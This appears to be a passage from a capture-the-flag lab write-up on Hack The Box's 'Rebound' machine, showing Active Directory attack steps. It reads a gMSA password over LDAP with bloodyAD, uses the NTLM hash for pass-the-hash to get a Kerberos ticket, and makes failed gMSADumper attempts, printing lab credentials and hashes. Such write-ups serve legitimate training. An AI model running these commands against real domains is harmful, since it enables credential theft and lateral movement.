ReadgMSAPassword


According to the earlier assessment, the tbrady user has ReadGMSAPassword access to the delegator$ account. Now that the tbrady user has been [[Rebound_Lateral_Movement_tbrady#[RemotePotato0](https://github.com/antonioCoco/RemotePotato0)|compromised]], I can proceed.

msDS-ManagedPassword is the LDAP attribute that exposes the gMSA password, so I could simply request it with an LDAP query. Since I had no success with ldapsearch, I will resort to BloodyAD again.

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u tbrady -p '543BOMBOMBUNmanda' --host dc01.rebound.htb get object 'delegator$' --resolve-sd --attr msDS-ManagedPassword
 
distinguishedname: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msds-managedpassword.ntlm: aad3b435b51404eeaad3b435b51404ee:9b0ccb7d34c670b2a9c81c45bc8befc3
msds-managedpassword.b64encoded: IOCJT/tYf2VGNZVrkcIZv2aLwO+6Ehw/7l7W8qzd809vkDqv2wFGs1cHaR6S9fLT3qo1SupEZbSz2V/yS+CKJDLUSVWpTSKFrogU1K5JUonhbMHPAzduYOJJr9LpgRbyGA7juR3ZyqWQz9nJnqlK6A/FcrVT92BlPdLPggRj5IAHn7GstcyTpSl+AM398LfI9P7o+ffdhg2sxk6HSrlXcQG5U1DdQCKCuKSfxhP+SZ/ztoykdM5DfWWN/yTfw0SAoiBI0TBVLZI6JFDqipbcmbOP4+ktCXIBwyRz9PGmbf2lu+9VZuw0mKR7jC3AlxgrBK2BUgm1O7yk/vwTqsL8TA==

The msDS-ManagedPassword.NTLM line contains the NTLM hash of the delegator$ account. While I could attempt to crack the hash, I can also use it as-is with the pass-the-hash technique.

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-getTGT 'rebound.htb/delegator$' -hashes aad3b435b51404eeaad3b435b51404ee:9b0ccb7d34c670b2a9c81c45bc8befc3 -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Saving ticket in delegator$.ccache

Credential validated: a TGT was generated for the delegator$ account.

Kerberos Secrets


Technically, it’s also possible to retrieve the Kerberos secrets (AES128 and AES256 keys), which is preferred for OPSEC. Three well-known tools can be used for the operation:

Both DSInternals and GMSAPasswordReader require a valid session on the target system as the reading user, tbrady, whereas gMSADumper can be used remotely.

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ python3 gMSADumper/gMSADumper/gMSADumper.py -u tbrady -p 543BOMBOMBUNmanda -d rebound.htb -l dc01.rebound.htb
Traceback (most recent call last):
  File "/home/kali/archive/htb/labs/rebound/gMSADumper/gMSADumper/gMSADumper.py", line 133, in <module>
    main()
  File "/home/kali/archive/htb/labs/rebound/gMSADumper/gMSADumper/gMSADumper.py", line 79, in main
    conn = Connection(server, user='{}\\{}'.format(args.domain, args.username), password=args.password, authentication=NTLM, auto_bind=True)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 363, in __init__
    self._do_auto_bind()
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 412, in _do_auto_bind
    raise LDAPBindError(error)
ldap3.core.exceptions.LDAPBindError: automatic bind not successful - strongerAuthRequired

The initial attempt fails with strongerAuthRequired (LDAP result code 8), which is what the DC returns when LDAP signing is enforced and the client binds with NTLM over plain LDAP. Another attempt will be made with the TGT of the tbrady user.

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ KRB5CCNAME=tbrady@dc01.rebound.htb.ccache python3 gMSADumper/gMSADumper/gMSADumper.py -k -d rebound.htb -l dc01.rebound.htb
Traceback (most recent call last):
  File "/home/kali/archive/htb/labs/rebound/gMSADumper/gMSADumper/gMSADumper.py", line 133, in <module>
    main()
  File "/home/kali/archive/htb/labs/rebound/gMSADumper/gMSADumper/gMSADumper.py", line 81, in main
    conn = Connection(server, authentication=SASL, sasl_mechanism=KERBEROS, auto_bind=True)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 363, in __init__
    self._do_auto_bind()
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 389, in _do_auto_bind
    self.bind(read_server_info=True)
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 615, in bind
    response = self.do_sasl_bind(controls)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 1343, in do_sasl_bind
    result = sasl_gssapi(self, controls)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/ldap3/protocol/sasl/kerberos.py", line 109, in sasl_gssapi
    return _posix_sasl_gssapi(connection, controls)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/ldap3/protocol/sasl/kerberos.py", line 232, in _posix_sasl_gssapi
    out_token = ctx.step(in_token)
                ^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/decorator.py", line 232, in fun
    return caller(func, *(extras + args), **kw)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/gssapi/_utils.py", line 165, in check_last_err
    return func(self, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/decorator.py", line 232, in fun
    return caller(func, *(extras + args), **kw)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/gssapi/_utils.py", line 131, in catch_and_return_token
    return func(self, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/gssapi/sec_contexts.py", line 584, in step
    return self._initiator_step(token=token)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/gssapi/sec_contexts.py", line 606, in _initiator_step
    res = rsec_contexts.init_sec_context(self._target_name, self._creds,
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "gssapi/raw/sec_contexts.pyx", line 188, in gssapi.raw.sec_contexts.init_sec_context
gssapi.raw.misc.GSSError: Major (851968): Unspecified GSS failure.  Minor code may provide more information, Minor (2529639066): Cannot find KDC for realm "REBOUND.HTB"

It fails again. The tool itself does not rely on impacket’s Kerberos module but on the Python gssapi package, which doesn’t appear to be working well with the current installation of Python 3.11.4.

I also tried with the delegator$ account's TGT from the Validation step, to no avail.